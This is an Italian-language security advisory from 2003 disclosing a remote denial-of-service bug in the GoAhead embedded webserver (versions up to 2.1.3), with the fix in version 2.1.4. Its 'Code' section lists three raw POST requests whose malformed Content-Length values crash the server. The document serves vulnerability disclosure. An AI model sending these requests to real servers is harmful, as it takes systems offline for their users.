#######################################################################

                             Luigi Auriemma

Applicazione: Goahead webserver
              http://www.goahead.com/webserver/webserver.htm
Versions:     <= 2.1.3
Piattaforme:  multipiattaforma
Bugs:         Denial of Service
Data:         22 Sep 2003
Autore:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduzione
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduzione
===============


Goahead webserver e' un server OpenSource embedded che puo' essere
compilato su svariati sistemi (CE, Ecos, GNU/Linux, Lynx, MacOS, NW,
QNX4, VXWORKS, Win32 ed altri).
Esso e' supportato da molte compagnie che lo usano per i loro progetti
ed e' anche usato come "base" per altri webservers, inoltre e' stato
sviluppato con lo scopo di occupare poche risorse e di girare su
sistemi embedded.


#######################################################################

======
2) Bug
======


A richiesta POST con un parametro Content-Lenght uguale o minore di 0
causa un Denial of Service remoto.
Possibile esecuzione di codice non testata. (penso di si ma appunto non
l'ho testato).


#######################################################################


===========
3) The Code
===========


---
POST /home.asp HTTP/1.0
Content-Length: 0
---
POST /home.asp HTTP/1.0
Content-Length: -100
---
POST /home.asp HTTP/1.0
Content-Length: 9999999999
---


#######################################################################

======
4) Fix
======


Versione 2.1.4


#######################################################################